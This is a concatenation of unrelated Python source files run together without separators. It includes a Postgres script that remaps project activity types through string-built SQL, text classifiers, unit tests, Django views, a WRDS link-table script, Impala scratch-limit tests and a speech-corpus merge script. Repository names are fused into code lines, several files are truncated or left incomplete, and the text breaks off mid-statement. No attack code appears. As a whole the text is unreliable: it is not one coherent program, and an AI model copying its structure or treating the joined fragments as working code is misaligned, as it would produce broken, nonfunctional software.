activityTypeDict_AH.append({"oldValue":'Internships',"newValue":'Other'}) for x in activityTypeDict_AH: print(x['oldValue'],x['newValue']) query_AH = "update projects_project set activity_type_id = \ (select a.id from projects_activitytype as a where a.name = '"+x['newValue']+"') \ where engagement_type_id = \ (select e.id from projects_engagementtype as e where e.name = 'Access to Higher Education') \ and activity_type_id = \ (select c.id from projects_activitytype as c where c.name = '"+x['oldValue']+"')" print('query--',query_AH) cursor.execute(query_AH) connection.commit() activityTypeDict_CM = [] activityTypeDict_CM.append({"oldValue":'Unpaid Services',"newValue":'Other'}) activityTypeDict_CM.append({"oldValue":'Course',"newValue":'Other'}) activityTypeDict_CM.append({"oldValue":'General Activity',"newValue":'Other'}) activityTypeDict_CM.append({"oldValue":'Contract Services',"newValue":'Other'}) activityTypeDict_CM.append({"oldValue":'Training / Workshop / Presentation',"newValue":'Other'}) activityTypeDict_CM.append({"oldValue":'Event / Exhibit / Performance',"newValue":'Other'}) for x in activityTypeDict_CM: print(x['oldValue'],x['newValue']) query_CM = "update projects_project set activity_type_id = \ (select a.id from projects_activitytype as a where a.name = '"+x['newValue']+"') \ where engagement_type_id = \ (select e.id from projects_engagementtype as e where e.name = 'Community-Based Learning') \ and activity_type_id = \ (select c.id from projects_activitytype as c where c.name = '"+x['oldValue']+"')" print('query--',query_CM) cursor.execute(query_CM) connection.commit() activityTypeDict_ER = [] activityTypeDict_ER.append({"oldValue":'Unpaid Services',"newValue":'Other'}) activityTypeDict_ER.append({"oldValue":'Course',"newValue":'Other'}) activityTypeDict_ER.append({"oldValue":'Contract Services',"newValue":'Other'}) activityTypeDict_ER.append({"oldValue":'Mentoring',"newValue":'Other'}) activityTypeDict_ER.append({"oldValue":'Workshop',"newValue":'Other'}) activityTypeDict_ER.append({"oldValue":'Internships',"newValue":'Other'}) for x in activityTypeDict_ER: print(x['oldValue'],x['newValue']) query_ER = "update projects_project set activity_type_id = \ (select a.id from projects_activitytype as a where a.name = '"+x['newValue']+"') \ where engagement_type_id = \ (select e.id from projects_engagementtype as e where e.name = 'Engaged Research') \ and activity_type_id = \ (select c.id from projects_activitytype as c where c.name = '"+x['oldValue']+"')" print('query--',query_ER) cursor.execute(query_ER) connection.commit() activityTypeDict_KR = [] activityTypeDict_KR.append({"oldValue":'General Activity',"newValue":'Other'}) activityTypeDict_KR.append({"oldValue":'Course',"newValue":'Other'}) activityTypeDict_KR.append({"oldValue":'Meeting/Gathering',"newValue":'Community-oriented lecture/event'}) activityTypeDict_KR.append({"oldValue":'Unpaid Services',"newValue":'Other'}) activityTypeDict_KR.append({"oldValue":'Event / Exhibit / Performance',"newValue":'Community-oriented lecture/event'}) activityTypeDict_KR.append({"oldValue":'Contract Services',"newValue":'Specialized Service Contract'}) activityTypeDict_KR.append({"oldValue":'Training / Workshop / Presentation',"newValue":'Workshop'}) activityTypeDict_KR.append({"oldValue":'Service Activity',"newValue":'Workshop'}) activityTypeDict_KR.append({"oldValue":'Student Research',"newValue":'Workshop'}) for x in activityTypeDict_KR: print(x['oldValue'],x['newValue']) query_KR = "update projects_project set activity_type_id = \ (select a.id from projects_activitytype as a where a.name = '"+x['newValue']+"') \ where engagement_type_id = \ (select e.id from projects_engagementtype as e where e.name = 'Knowledge and Resource Sharing') \ and activity_type_id = \ (select c.id from projects_activitytype as c where c.name = '"+x['oldValue']+"')" print('query--',query_KR) cursor.execute(query_KR) connection.commit() activityTypeDict_VL = [] activityTypeDict_VL.append({"oldValue":'Unpaid Services',"newValue":'Service Activity'}) activityTypeDict_VL.append({"oldValue":'Course',"newValue":'Other'}) activityTypeDict_VL.append({"oldValue":'General Activity',"newValue":'Service Activity'}) activityTypeDict_VL.append({"oldValue":'Contract Services',"newValue":'Other'}) activityTypeDict_VL.append({"oldValue":'Workshop',"newValue":'Other'}) activityTypeDict_VL.append({"oldValue":'Training / Workshop / Presentation',"newValue":'Other'}) activityTypeDict_VL.append({"oldValue":'Meeting / Gathering',"newValue":'Other'}) for x in activityTypeDict_VL: print(x['oldValue'],x['newValue']) query_VL = "update projects_project set activity_type_id = \ (select a.id from projects_activitytype as a where a.name = '"+x['newValue']+"') \ where engagement_type_id = \ (select e.id from projects_engagementtype as e where e.name = 'Volunteering') \ and activity_type_id = \ (select c.id from projects_activitytype as c where c.name = '"+x['oldValue']+"')" print('query--',query_VL) cursor.execute(query_VL) connection.commit() except (psycopg2.Error) as error: print("Error while connecting to Postgres SQL", error) # finally: # # closing database connection. # if connection: # connection.commit() # # drop all_projects_start_and_end_date temp table # cursor.execute(sql.drop_temp_table_all_projects_start_and_end_dates_sql) cursor.close() connection.close() print("Postgres SQL connection is closed")# import libraries import sys import pandas as pd import numpy as np from sqlalchemy import create_engine import nltk nltk.download(['punkt', 'wordnet', 'stopwords']) from nltk.tokenize import word_tokenize from nltk.corpus import stopwords from nltk.stem import WordNetLemmatizer import re from sklearn.datasets import make_multilabel_classification from sklearn.multioutput import MultiOutputClassifier from sklearn.neighbors import KNeighborsClassifier from sklearn.pipeline import Pipeline from sklearn.metrics import confusion_matrix, classification_report, accuracy_score from sklearn.model_selection import train_test_split from sklearn.ensemble import RandomForestClassifier from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer from sklearn.model_selection import GridSearchCV import pickle def load_data(database_filepath): ''' This function loads data from a database into a DataFrame, then separates the categories part (X), the messages part (y) and the category labels (category_names) and returns them. Args: database_filepath (str) Returns: X (2d numpy array) - categories y (1d numpy array) - messages category_names (list of str) ''' # load data from database engine = create_engine('sqlite:///{}'.format(database_filepath)) df = pd.read_sql('df', engine) # extract category names df_y = df.iloc[:,4:] category_names = df_y.columns.tolist() # extract X and y df_X = df['message'] X = df_X y = df_y return X, y, category_names def tokenize(text): ''' Args: text (str) - text from a text message Returns: clean_tokens (list of str) - list where each item is a word; tokenized and cleaned ''' # replace urls with string 'urlplaceholder' url_regex = 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+' detected_urls = re.findall(url_regex, text) for url in detected_urls: text = text.replace(url, "urlplaceholder") # normalize text text = re.sub(r"[^a-zA-Z0-9]", " ", text.lower()) # tokenize text tokens = word_tokenize(text) # remove stopwords tokens = [token for token in tokens if token not in stopwords.words("english")] # lemmatize tokens lemmatizer = WordNetLemmatizer() clean_tokens = [] for tok in tokens: clean_tok = lemmatizer.lemmatize(tok).strip() clean_tokens.append(clean_tok) return clean_tokens def build_model(): pipe = Pipeline(steps = [ ('vect', CountVectorizer(tokenizer=tokenize)), ('tfidf', TfidfTransformer()), ('clf', MultiOutputClassifier(RandomForestClassifier())), ]) # Initializing parameters for Grid search parameters = {} parameters['clf__estimator__n_estimators'] = [10, 50] # GridSearch Object with pipeline and parameters cv = GridSearchCV(pipe, param_grid=parameters, cv=2, verbose=10) return cv def evaluate_model(cv, X_test, y_test, category_names): """ Function to evaluate model """ # Predict results of X_test y_pred = cv.predict(X_test) # Converting both y_pred and Y_test into DataFrames y_pred = pd.DataFrame(y_pred, columns=category_names) y_test = pd.DataFrame(y_test, columns=category_names) # Print classification report and accuracy with respect to each column for c in category_names: print(c, classification_report(y_test[c].values, y_pred[c].values)) print("Accuracy of "+str(c)+": "+str(accuracy_score(y_test[c].values, y_pred[c].values))) def save_model(model, model_filepath): """ This function for saving the model """ # open the file pickle_out = open(model_filepath, "wb") # write model to it pickle.dump(model, pickle_out) # close pickle file pickle_out.close() def main(): if len(sys.argv) == 3: database_filepath, model_filepath = sys.argv[1:] print('Loading data...\n DATABASE: {}'.format(database_filepath)) X, y, category_names = load_data(database_filepath) X_train, X_test, y_train, y_test = train_test_split(X, y) print('Building model...') model = build_model() print('Training model...') model.fit(X_train, y_train) print('Evaluating model...') evaluate_model(model, X_test, y_test, category_names) print('Saving model...\n MODEL: {}'.format(model_filepath)) save_model(model, model_filepath) print('Trained model saved!') else: print('Please provide the filepath of the disaster messages database '\ 'as the first argument and the filepath of the pickle file to '\ 'save the model to as the second argument. \n\nExample: python '\ 'train_classifier.py ../data/DisasterResponse.db classifier.pkl') if __name__ == '__main__': main()kemmot/PyTasks import unittest import unittest.mock as mock import filters.tasknamefilter as tasknamefilter class TaskNameFilterTests(unittest.TestCase): def test_constructor_sets_name(self): target = tasknamefilter.TaskNameFilter(mock.Mock(), 'test') self.assertEqual('test', target.name) def test_is_match_returns_true_on_matching_name(self): mock_context = mock.Mock() task = mock.Mock() task.name = 'test' self.assertTrue(tasknamefilter.TaskNameFilter(mock_context, 'test').is_match(task)) def test_is_match_returns_false_on_non_matching_index(self): mock_context = mock.Mock() task = mock.Mock() task.name = 'woble' self.assertFalse(tasknamefilter.TaskNameFilter(mock_context, 'test').is_match(task)) def test_is_match_returns_true_when_name_contains_same_case(self): mock_context = mock.Mock() task = mock.Mock() task.name = 'onetesttwo' self.assertTrue(tasknamefilter.TaskNameFilter(mock_context, 'test').is_match(task)) def test_is_match_returns_true_when_name_contains_different_case(self): mock_context = mock.Mock() task = mock.Mock() task.name = 'oneTESTtwo' self.assertTrue(tasknamefilter.TaskNameFilter(mock_context, 'test').is_match(task)) class TaskNameFilterParserTests(unittest.TestCase): def test_parse_none_returns_none(self): mock_context = mock.Mock() target = tasknamefilter.TaskNameFilterParser().parse(mock_context, None) self.assertIsNone(target) def test_parse_empty_string_returns_none(self): mock_context = mock.Mock() target = tasknamefilter.TaskNameFilterParser().parse(mock_context, '') self.assertIsNone(target) def test_parse_non_empty_string_returns_filter(self): mock_context = mock.Mock() target = tasknamefilter.TaskNameFilterParser().parse(mock_context, 'test') self.assertIsInstance(target, tasknamefilter.TaskNameFilter) self.assertEqual('test', target.name) def test_parse_strips_forward_slashes(self): mock_context = mock.Mock() target = tasknamefilter.TaskNameFilterParser().parse(mock_context, '/test/') self.assertIsInstance(target, tasknamefilter.TaskNameFilter) self.assertEqual('test', target.name) 10-100 # Copyright (c) Facebook, Inc. and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. import torch from torch.utils.data import Dataset from listops.data_preprocessing import load_listops_data class ListOpsDataset(Dataset): def __init__(self, data_path, vocab_path, max_len=float("inf")): super().__init__() self.data, idx_to_word, word_to_idx = load_listops_data(data_path, vocab_path, max_len) self.vocab_size = len(idx_to_word) self.label_size = 10 def __getitem__(self, index): e = self.data[index] return e["label"], e["tokens"] def __len__(self): return len(self.data) @staticmethod def collate_fn(data): labels, tokens = zip(*data) labels = torch.tensor(labels, dtype=torch.long) max_len = max(len(e) for e in tokens) mask = torch.zeros((len(tokens), max_len), dtype=torch.float32) for idx, e in enumerate(tokens): mask[idx, :len(e)] = 1 tokens = [e + [0] * (max_len - len(e)) for e in tokens] tokens = torch.tensor(tokens, dtype=torch.long) return labels, tokens, mask """ Functions for when the UI sends JSON requests to route to TA2s as gRPC calls - Right now this code is quite redundant. Wait for integration to factor it out, e.g. lots may change--including the "req_" files being part of a separate service """ import http import json from collections import OrderedDict from django.shortcuts import render from django.http import JsonResponse from django.views.decorators.csrf import csrf_exempt from tworaven_apps.ta3_search.forms import MessageListenerForm from tworaven_apps.ta3_search.message_util import MessageUtil, KEY_MESSSAGE from tworaven_apps.utils.view_helper import get_session_key from django.contrib.auth.decorators import login_required from tworaven_apps.utils.view_helper import get_request_body_as_json @login_required @csrf_exempt def view_end_ta3_search(request): """End the D3M search via the UI""" success, info_dict = get_request_body_as_json(request) if not success: return JsonResponse(dict(success=False, message="No JSON info found in request.")) if not KEY_MESSSAGE in info_dict: return JsonResponse(\ dict(success=False, message="No '%s' found in request." % KEY_MESSSAGE)) if not 'is_success' in info_dict: return JsonResponse(dict(success=False, message="No 'is_success' found in request.")) is_success = info_dict['is_success'] if not is_success in [True, False]: return JsonResponse(dict(success=False, message="'is_success' must be a boolean (true/false)")) MessageUtil.send_shutdown_message(info_dict[KEY_MESSSAGE], is_success=is_success) # open post commands + message # send appropriate message to the listeners return JsonResponse(dict(success=True, message='shutdown message sent')) @login_required @csrf_exempt def view_send_reviewer_message(request): """Send a message to the console""" success, info_dict = get_request_body_as_json(request) if not success: return JsonResponse(dict(success=False, message="No JSON info found in request.")) if not KEY_MESSSAGE in info_dict: return JsonResponse(\ dict(success=False, message="No '%s' found in request." % KEY_MESSSAGE)) msg_to_send = info_dict.get(KEY_MESSSAGE) MessageUtil.send_message(msg_to_send) return JsonResponse(dict(success=True, message='message sent: %s' % msg_to_send)) @csrf_exempt def view_register_listener(request): """register a web url for messages related to ta3_search""" if request.method == 'GET': # validate the request ml_form = MessageListenerForm(request.GET) if ml_form.is_valid(): # Looks good, get the listener # new_listener, created = ml_form.get_listener() # create user message # user_msg = 'Listener url registered: %s' % new_listener.web_url if not created: user_msg = '%s. Note: this listener already existed.' % \ user_msg user_msg = '%s (updated: %s)' % (user_msg, new_listener.modified) # send message to listener--to print to console # MessageUtil.send_message_to_listener(\ user_msg, new_listener) # respond to view request # return JsonResponse(dict(success=True, message=user_msg)) else: user_msg = 'Listener not registered. Errors found.' return JsonResponse(dict(success=False, message=user_msg, details=ml_form.errors), status=http.HTTPStatus.BAD_REQUEST) user_msg = ('Listener not registered. Please submit' ' a GET with a "web_url" attribute.') return JsonResponse(dict(success=False, message=user_msg), status=http.HTTPStatus.BAD_REQUEST) from django.conf import settings from django.core.management import call_command from django.core.management.base import BaseCommand from ...models import Privilege, SlackAccess class Command(BaseCommand): def handle(*args, **opts): for slug, title, team_name in [ ("tracon-slack", "Traconin Slack-yhteisö", "traconfi"), ("desuslack", "Desuconin Slack-yhteisö", "desucon"), ]: privilege, created = Privilege.objects.get_or_create( slug=slug, defaults=dict( title=title, description="""TODO WRITE ME""".strip().format(default_from_email=settings.DEFAULT_FROM_EMAIL), request_success_message="", grant_code="access.privileges:invite_to_slack", ), ) slack_access, created = SlackAccess.objects.get_or_create( privilege=privilege, defaults=dict( team_name=team_name, ), ) theodorachu/ihavenewsforyou1-10 import random import numpy as np from corpusInterface import CorpusInterface from nltk.classify import NaiveBayesClassifier from nltk.classify.scikitlearn import SklearnClassifier from sklearn.linear_model import LogisticRegression ARTICLE_FILE = 'newsArticles.json' corpusInterface = CorpusInterface() contents = corpusInterface.extractContent() left = [] right = [] center = [] for content in contents: label = content['bias'][6:] if label == 'Left' or label == 'Lean Left': left.append(content) elif label == 'Right' or label == 'Lean Right': right.append(content) elif label == 'Center' or label == 'Mixed': center.append(content) random.shuffle(left) random.shuffle(right) random.shuffle(center) # FEATURE EXTRACTOR: bag of words def word_feats(words): return dict([(word, True) for word in words]) # NAIVE BAYES left = [(word_feats(corpusInterface.rm_stop_and_punc(x['title'] + " " + x['text']).split(' ')), 'left') for x in left] right = [(word_feats(corpusInterface.rm_stop_and_punc(x['title'] + " " + x['text']).split(' ')), 'right') for x in right] center = [(word_feats(corpusInterface.rm_stop_and_punc(x['title'] + " " + x['text']).split(' ')), 'center') for x in center] # TRAIN trainfeats = left[:-20] + right[:-20] + center[:-20] #classifier = NaiveBayesClassifier.train(trainfeats) # NAIVE BAYES classifier = SklearnClassifier(LogisticRegression()).train(trainfeats) # TEST testfeats = [x[0] for x in (left[-20:] + right[-20:] + center[-20:])] total = len(testfeats) numLeftWrong = 0 numRightWrong = 0 numCenterWrong = 0 for i in xrange(len(testfeats)): predicted = classifier.classify(testfeats[i]) if i < 20 and predicted != 'left': numLeftWrong += 1 elif i >= 20 and i < 40 and predicted != 'right': numRightWrong += 1 elif i >= 40 and predicted != 'center': numCenterWrong += 1 totalWrong = numLeftWrong + numRightWrong + numCenterWrong print "Accuracy: (" + str(total - totalWrong) + "/" + str(total) + ") = " + str(float(total - totalWrong) / total) + '%' print "Left Accuracy: (" + str(20 - numLeftWrong) + "/" + str(20) + ")" print "Right Accuracy: (" + str(20 - numRightWrong) + "/" + str(20) + ")" print "Center Accuracy: (" + str(20 - numCenterWrong) + "/" + str(20) + ")"Bhaskers-Blu-Org2/tes-azure # coding: utf-8 # Copyright (c) Microsoft Corporation. # Licensed under the MIT license. from flask import Blueprint tesapi = Blueprint('tesapi', __name__, template_folder='templates') from . import api # noqa: F401 """ Tests for ComputedReaction. Some tests adapted from pymatgen. """ import pytest from pathlib import Path from monty.serialization import loadfn from rxn_network.reactions.computed import ComputedReaction TEST_FILES_PATH = Path(__file__).parent.parent / "test_files" ENTRIES_FILE = "yocl-namno2_rxn_entries.json.gz" @pytest.fixture(scope="session") def entries(): return loadfn(TEST_FILES_PATH / ENTRIES_FILE) @pytest.fixture(scope="session") def reactants(entries): return [entries["YOCl"], entries["NaMnO2"], entries["O2"]] @pytest.fixture(scope="session") def products(entries): return [entries["Y2Mn2O7"], entries["NaCl"]] @pytest.fixture(scope="session") def pre_balanced_rxn(reactants, products): """Returns a simple, pre-balanced computed reaction.""" coefficients = [-2, -2, -0.5, 1, 2] rxn = ComputedReaction( entries=reactants + products, coefficients=coefficients, ) return rxn @pytest.fixture(scope="session") def auto_balanced_rxn(reactants, products): """Returns the same iron oxidation reaction, after automatically balancing""" return ComputedReaction.balance( reactant_entries=reactants, product_entries=products ) def test_energy(pre_balanced_rxn, auto_balanced_rxn): expected_energy = -2.701048 assert pre_balanced_rxn.energy == pytest.approx(expected_energy) assert auto_balanced_rxn.energy == pytest.approx(expected_energy) def test_energy_per_atom(pre_balanced_rxn, auto_balanced_rxn): expected_energy_per_atom = -0.1800700 assert pre_balanced_rxn.energy_per_atom == pytest.approx(expected_energy_per_atom) assert auto_balanced_rxn.energy_per_atom == pytest.approx(expected_energy_per_atom) def test_energy_uncertainty(pre_balanced_rxn, auto_balanced_rxn): expected_energy_uncertainty = 0.0229486383 assert pre_balanced_rxn.energy_uncertainty == pytest.approx( expected_energy_uncertainty ) assert auto_balanced_rxn.energy_uncertainty == pytest.approx( expected_energy_uncertainty ) def test_energy_uncertainty_per_atom(pre_balanced_rxn, auto_balanced_rxn): expected_energy_uncertainty_per_atom = 0.0015299092 assert pre_balanced_rxn.energy_uncertainty_per_atom == pytest.approx( expected_energy_uncertainty_per_atom ) assert auto_balanced_rxn.energy_uncertainty_per_atom == pytest.approx( expected_energy_uncertainty_per_atom ) def test_copy(pre_balanced_rxn, auto_balanced_rxn): pre_balanced_rxn_copy = pre_balanced_rxn.copy() auto_balanced_rxn_copy = auto_balanced_rxn.copy() assert ( pre_balanced_rxn == auto_balanced_rxn == pre_balanced_rxn_copy == auto_balanced_rxn_copy ) def test_reverse(pre_balanced_rxn): pre_balanced_rxn_rev = pre_balanced_rxn.reverse() assert pre_balanced_rxn.energy == -pre_balanced_rxn_rev.energy assert pre_balanced_rxn == pre_balanced_rxn_rev.reverse() #!/usr/bin/env python3 """ script: link_compustat_ibis.py author: date: Spring 2018 This script creates a mapping table between IBES and Compustat. It supports the following methods: - Link via CRSP - Link via S_SECURITY Notes: - Output can be specified manually or via argparse - References: [1] https://wrds-web.wharton.upenn.edu/wrds/support/Data/_010Linking%20Databases/_000Linking%20IBES%20and%20CRSP%20Data.cfm (WRDS tutorial on mapping IBES to CRSP) [2] https://wrds-web.wharton.upenn.edu/wrds/support/code_show.cfm?path=I-B-E-S/cibeslink.sas (WRDS SAS script mapping IBES to Compustat) [3] http://www.wrds.us/index.php/forum_wrds/viewthread/6/ (Additional clarifications from a forum post) """ import wrds import argparse import pandas as pd import os, sys def main(output_file, method): # Change working directory to path of script # This ensures that oufile is written to script directory if its not an absolute path os.chdir(os.path.dirname(os.path.realpath(sys.argv[0]))) # Connect to wrds db = wrds.Connection() # Execute method if method is None: # Nothing specifed crsp_method(db, output_file) elif method.upper() == 'GSEC': gsec_method(db, output_file) elif method.upper() == 'CRSP': crsp_method(db, output_file) else: print("Unknown method specified:", method) def gsec_method(db, output_file): """ This method uses the IBTIC variable from Compustat's G_SECURITY table to add the Compustat GVKEY to IBES See: https://wrds-web.wharton.upenn.edu/wrds/tools/variable.cfm?library_id=7&file_id=64675 """ # Get IBES data ibes = db.get_table(library='ibes', table='idsum', columns=['ticker', 'cusip', 'cname']) ibes.drop_duplicates(inplace=True) # Get G_SECURITY data gsec = db.get_table(library='comp', table='security', columns=['gvkey', 'ibtic']) gsec.drop_duplicates(inplace=True) # Link G_Security and foreign CRSP out = ibes.merge(gsec, left_on='ticker', right_on='ibtic') # Export complete table out.to_csv(output_file, index=False) def crsp_method(db, output_file): """ This function maps cusip in IBES to ncusip in CRSP (ignoring date because it's "of little benefit" [1]). It then maps CRSP Compustat via the permno found in ccmxpf_lnkhist ([2]). The resulting linktable contains the IBES Ticker, CUSIP, company name (CNAME) and Compustat GVKEY. """ # Get IBES data ibes = db.get_table(library='ibes', table='idsum', columns=['ticker', 'cusip', 'cname']) ibes.drop_duplicates(inplace=True) # Get CRSP data crsp = db.get_table(library='crsp', table='stocknames', columns=['permno', 'ncusip']) crsp.drop_duplicates(inplace=True) # Merge IBES and CRSP link1 = ibes.merge(crsp, left_on='cusip', right_on='ncusip') # Get Compustat-CRSP linktable link2 = db.get_table(library='crsp', table='ccmxpf_lnkhist', columns=['gvkey', 'lpermno', 'lpermco', 'linktype', 'linkprim']) # 'linkdt', 'linkenddt' link2 = link2[link2['linktype'].isin(['LC', 'LU'])] link2 = link2[link2['linkprim'].isin(['C', 'P'])] link2.drop(['linktype', 'linkprim'], axis=1, inplace=True) # Merge the two link tables out = link2.merge(link1, left_on='lpermno', right_on='permno') out.drop_duplicates(inplace=True) # Export complete table out.to_csv(output_file, index=False) if __name__ == '__main__': parser = argparse.ArgumentParser(description='Create link table between Compustat and IBES. WRDS login credentials are required. ') parser.add_argument('-o', '--output', help='Output file (csv)', required=True, type=str) # Output file arg parser.add_argument('-m', '--method', help='Method to use to create the link table. Options are "gsec" for the "G_SECURITY" table method, and "crsp" for the CRSP table method. Defaults to CRSP method', required=False, type=str) # Output file arg args = vars(parser.parse_args()) outfile = args['output'] method = args['method'] main(outfile, method) setup.py #!/usr/bin/python # -*- coding: utf8 -*- import os from setuptools import setup here = os.path.abspath(os.path.dirname(__file__)) install_requires = [ 'Django >=1.5,<1.7', 'requests >=2.2,<2.3', 'termcolor == 1.1.0', 'django-leaflet == 0.13.5', 'django-localeurl == 2.0.1', 'django-pjax == 1.2', 'easydict == 1.4', 'django_compressor == 1.3', 'django-ganalytics == 0.2', 'django-recaptcha == 0.0.9', 'landez == 2.2.0', 'BeautifulSoup == 3.2.1' ] setup( name='rando', version=open(os.path.join(here, 'VERSION')).read().strip(), author='', author_email='', url='http://makina-corpus.com', install_requires=install_requires ) 1-10 # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from tests.beeswax.impala_beeswax import ImpalaBeeswaxException from tests.common.impala_test_suite import ImpalaTestSuite from tests.common.test_dimensions import create_single_exec_option_dimension from tests.common.test_dimensions import create_uncompressed_text_dimension class TestScratchLimit(ImpalaTestSuite): """ This class tests the functionality of setting the scratch limit as a query option """ spill_query = """ select o_orderdate, o_custkey, o_comment from tpch.orders order by o_orderdate """ # Block manager memory limit that is low enough to # force Impala to spill to disk when executing 'spill_query' max_block_mgr_memory = "64m" @classmethod def get_workload(self): return 'functional-query' @classmethod def add_test_dimensions(cls): super(TestScratchLimit, cls).add_test_dimensions() # There is no reason to run these tests using all dimensions. cls.ImpalaTestMatrix.add_dimension(create_single_exec_option_dimension()) cls.ImpalaTestMatrix.add_dimension( create_uncompressed_text_dimension(cls.get_workload())) def test_with_high_scratch_limit(self, vector): """ Query runs to completion with a scratch limit well above its required scratch space which in this case is 128m. """ exec_option = vector.get_value('exec_option') exec_option['max_block_mgr_memory'] = self.max_block_mgr_memory exec_option['scratch_limit'] = '500m' self.execute_query_expect_success(self.client, self.spill_query, exec_option) def test_with_low_scratch_limit(self, vector): """ Query throws the appropriate exception with a scratch limit well below its required scratch space which in this case is 128m. """ exec_option = vector.get_value('exec_option') exec_option['max_block_mgr_memory'] = self.max_block_mgr_memory exec_option['scratch_limit'] = '24m' expected_error = 'Scratch space limit of %s bytes exceeded' scratch_limit_in_bytes = 24 * 1024 * 1024 try: self.execute_query(self.spill_query, exec_option) assert False, "Query was expected to fail" except ImpalaBeeswaxException as e: assert expected_error % scratch_limit_in_bytes in str(e) def test_with_zero_scratch_limit(self, vector): """ Query throws the appropriate exception with a scratch limit of zero which means no scratch space can be allocated. """ exec_option = vector.get_value('exec_option') exec_option['max_block_mgr_memory'] = self.max_block_mgr_memory exec_option['scratch_limit'] = '0' self.execute_query_expect_failure(self.spill_query, exec_option) def test_with_unlimited_scratch_limit(self, vector): """ Query runs to completion with a scratch Limit of -1 means default/no limit. """ exec_option = vector.get_value('exec_option') exec_option['max_block_mgr_memory'] = self.max_block_mgr_memory exec_option['scratch_limit'] = '-1' self.execute_query_expect_success(self.client, self.spill_query, exec_option) def test_without_specifying_scratch_limit(self, vector): """ Query runs to completion with the default setting of no scratch limit. """ exec_option = vector.get_value('exec_option') exec_option['max_block_mgr_memory'] = self.max_block_mgr_memory self.execute_query_expect_success(self.client, self.spill_query, exec_option) def test_with_zero_scratch_limit_no_memory_limit(self, vector): """ Query runs to completion without spilling as there is no limit on block memory manger. Scratch limit of zero ensures spilling is disabled. """ exec_option = vector.get_value('exec_option') exec_option['scratch_limit'] = '0' self.execute_query_expect_success(self.client, self.spill_query, exec_option) #!/usr/bin/env python # This work was created by participants in the DataONE project, and is # jointly copyrighted by participating institutions in DataONE. For # more information on DataONE, see our web site at http://dataone.org. # # Copyright 2009-2017 DataONE # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Generate a Data Package (Resource Map) from a stream of PIDs. This is an example on how to use the DataONE Client and Common libraries for Python. """ import argparse import logging import d1_common.const import d1_common.env import d1_common.resource_map def main(): parser = argparse.ArgumentParser( description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter ) parser.add_argument("--debug", action="store_true", help="Debug level logging") parser.add_argument( "--env", type=str, default="prod", help="Environment, one of {}".format(", ".join(d1_common.env.D1_ENV_DICT)), ) parser.add_argument( "--cert-pub", dest="cert_pem_path", action="store", help="Path to PEM formatted public key of certificate", ) parser.add_argument( "--cert-key", dest="cert_key_path", action="store", help="Path to PEM formatted private key of certificate", ) parser.add_argument( "--timeout", action="store", default=d1_common.const.DEFAULT_HTTP_TIMEOUT, help="Amount of time to wait for calls to complete (seconds)", ) def createSimpleResourceMap(ore_pid, sci_meta_pid, data_pids): """Create a simple resource map with one metadata document and n data objects.""" ore = d1_common.resource_map.ResourceMap() ore.initialize(ore_pid) ore.addMetadataDocument(sci_meta_pid) ore.addDataDocuments(data_pids, sci_meta_pid) return ore def pids2ore(in_stream, fmt="xml", base_url="https://cn.dataone.org/cn"): """read pids from in_stream and generate a resource map. first pid is the ore_pid second is the sci meta pid remainder are data pids """ pids = [] for line in in_stream: pid = line.strip() if len(pid) > 0: if not pid.startswith("# "): pids.append(pid) if (len(pids)) < 2: raise ValueError("Insufficient identifiers provided.") logging.info("Read %d identifiers", len(pids)) ore = d1_common.resource_map.ResourceMap(base_url=base_url) logging.info("ORE PID = %s", pids[0]) ore.initialize(pids[0]) logging.info("Metadata PID = %s", pids[1]) ore.addMetadataDocument(pids[1]) ore.addDataDocuments(pids[2:], pids[1]) return ore.serialize_to_display(doc_format=fmt) # 2020 and """ Base strategy class for a specific task. This class is open for custom extension, in order to create different execution strategies for this task. See BaseStrategy for more details. """ from abc import abstractmethod from typing import List from icarus_simulator.strategies.base_strat import BaseStrat from icarus_simulator.structure_definitions import ( PathData, Edge, EdgeData, DirectionData, ) class BasePathFilteringStrat(BaseStrat): @abstractmethod def compute( self, edges: List[Edge], edge_data: EdgeData, path_data: PathData, allowed_sources: List[int], ) -> DirectionData: raise NotImplementedError import os import click from tqdm import tqdm import audiomate from audiomate.corpus import subset SEED = 3294 MAX_DEV_TEST_DURATION = 15000 MAX_TRAIN_UTT_DURATION = 25.0 @click.command() @click.argument('download_folder', type=click.Path(exists=True)) @click.argument('output_folder', type=click.Path()) def run(download_folder, output_folder): corpora_names = [ ('common_voice', 'common-voice'), ('mailabs', 'mailabs'), ('swc', 'swc'), ('tuda', 'tuda'), ('voxforge', 'voxforge'), ] print('Load corpora') corpora = {} for name, reader_type in corpora_names: print(' - {} ...'.format(name)) full_path = os.path.join(download_folder, name) c = audiomate.Corpus.load( full_path, reader=reader_type ) corpora[name] = c print('Create Train/Dev/Test - if not already exist') for name, corpus in corpora.items(): prepare_corpus(corpus, name) print('Insert full subviews') # # Insert subviews containing all utterances # so we have a reference when merged # for name, corpus in corpora.items(): all_utts = set(corpus.utterances.keys()) full_filter = subset.MatchingUtteranceIdxFilter(all_utts) full_subview = subset.Subview(corpus, filter_criteria=[full_filter]) corpus.import_subview('full', full_subview) print('Suffix subviews') # # Suffix subviews to have the correct names when merging # for name, corpus in corpora.items(): print(' - {} ...'.format(name)) original_subview_names = list(corpus.subviews.keys()) for subview_name in original_subview_names: new_subview_name = '{}_{}'.format(subview_name, name) corpus.subviews[new_subview_name] = corpus.subviews[subview_name] del corpus.subviews[subview_name] print('Merge corpora ...') full_corpus = audiomate.Corpus.merge_corpora(list(corpora.values())) print('Create merged train/test/dev subviews ...') for part in ['train', 'dev', 'test']: utt_ids = set() for name, corpus in corpora.items(): sv = 